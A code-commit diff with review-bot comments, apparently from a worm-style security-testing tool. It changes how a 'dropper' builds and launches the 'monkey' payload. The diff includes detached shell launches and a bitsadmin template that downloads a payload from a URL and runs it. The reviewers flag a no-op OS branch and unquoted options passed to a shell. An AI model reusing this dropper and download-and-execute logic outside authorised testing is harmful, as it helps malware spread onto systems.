minor fix in dropper

Itay Mizeretz 2017-08-28 09:41:27 +03:00
parent 6f74a5e6cc
commit 332a11b272
2 changed files with 12 additions and 7 deletions


@ -10,6 +10,7 @@ import argparse
from ctypes import c_char_p from ctypes import c_char_p
from model import MONKEY_CMDLINE from model import MONKEY_CMDLINE
from config import WormConfiguration from config import WormConfiguration
from system_info import SystemInfoCollector, OperatingSystem
if "win32" == sys.platform: if "win32" == sys.platform:
from win32process import DETACHED_PROCESS from win32process import DETACHED_PROCESS
@ -92,19 +93,21 @@ class MonkeyDrops(object):
except: except:
LOG.warn("Cannot set reference date to destination file") LOG.warn("Cannot set reference date to destination file")
monkey_cmdline = MONKEY_CMDLINE % {'monkey_path': self._config['destination_path'], if OperatingSystem.Windows == SystemInfoCollector.get_os():
} monkey_cmdline = MONKEY_CMDLINE % {'monkey_path': self._config['destination_path']}
else:
monkey_cmdline = MONKEY_CMDLINE % {'monkey_path': self._config['destination_path']}
if self.opts.parent: if self.opts.parent:
monkey_cmdline += "-p %s" % self.opts.parent monkey_cmdline += " -p %s" % self.opts.parent
if self.opts.tunnel: if self.opts.tunnel:
monkey_cmdline += "-t %s" % self.opts.tunnel monkey_cmdline += " -t %s" % self.opts.tunnel
if self.opts.server: if self.opts.server:
monkey_cmdline += "-s %s" % self.opts.server monkey_cmdline += " -s %s" % self.opts.server
if self.opts.depth: if self.opts.depth:
monkey_cmdline += "-d %s" % self.opts.depth monkey_cmdline += " -d %s" % self.opts.depth
monkey_process = subprocess.Popen(monkey_cmdline, shell=True, monkey_process = subprocess.Popen(monkey_cmdline, shell=True,
stdin=None, stdout=None, stderr=None, stdin=None, stdout=None, stderr=None,
close_fds=True, creationflags=DETACHED_PROCESS) close_fds=True, creationflags=DETACHED_PROCESS)
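Review bot: Both arms of the new `if OperatingSystem.Windows == SystemInfoCollector.get_os():` format the same `MONKEY_CMDLINE` template, so the branch has no effect and the non-Windows arm still produces the `cmd /c` form. The same commit adds `MONKEY_CMDLINE_LINUX` to the model file, but the import here still brings in only `MONKEY_CMDLINE`; if the else arm was meant to use the new constant, the import would become `from model import MONKEY_CMDLINE, MONKEY_CMDLINE_LINUX` and the else arm `monkey_cmdline = MONKEY_CMDLINE_LINUX % {'monkey_path': self._config['destination_path']}`. Separately, the assembled string is run with `shell=True` and the `-p`/`-t`/`-s`/`-d` values are appended unquoted, so any shell metacharacter in those options is interpreted by the shell; a comment stating where these values come from and why a shell is required would help the next reader. The enclosing method starts and ends outside the hunk.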


@ -5,7 +5,9 @@ __author__ = 'itamar'
MONKEY_ARG = "m0nk3y" MONKEY_ARG = "m0nk3y"
DROPPER_ARG = "dr0pp3r" DROPPER_ARG = "dr0pp3r"
DROPPER_CMDLINE = 'cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, ) DROPPER_CMDLINE = 'cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, )
# TODO: rename to WINDOWS/LINUX appropriately
MONKEY_CMDLINE = 'cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, ) MONKEY_CMDLINE = 'cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, )
MONKEY_CMDLINE_LINUX = './%%(monkey_path)s %s' % (MONKEY_ARG, )
DROPPER_CMDLINE_DETACHED = 'cmd /c start cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, ) DROPPER_CMDLINE_DETACHED = 'cmd /c start cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, )
MONKEY_CMDLINE_DETACHED = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, ) MONKEY_CMDLINE_DETACHED = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, )
MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd /c %%(monkey_path)s %s"' % (MONKEY_ARG, ) MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd /c %%(monkey_path)s %s"' % (MONKEY_ARG, )
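Review bot: `MONKEY_CMDLINE_LINUX` hard-codes a `./` prefix in front of `%(monkey_path)s`, so the template only resolves as intended when the substituted path is relative to the working directory of the process that runs it; an absolute path would become `.//...` and be looked up under the current directory instead. The value substituted for `monkey_path` is not visible in this section, so this needs confirming against the caller. Until the rename in the TODO happens, a comment on each template such as `# Windows only: runs through cmd.exe` and `# POSIX: monkey_path must be relative to the cwd` would make the platform assumption explicit.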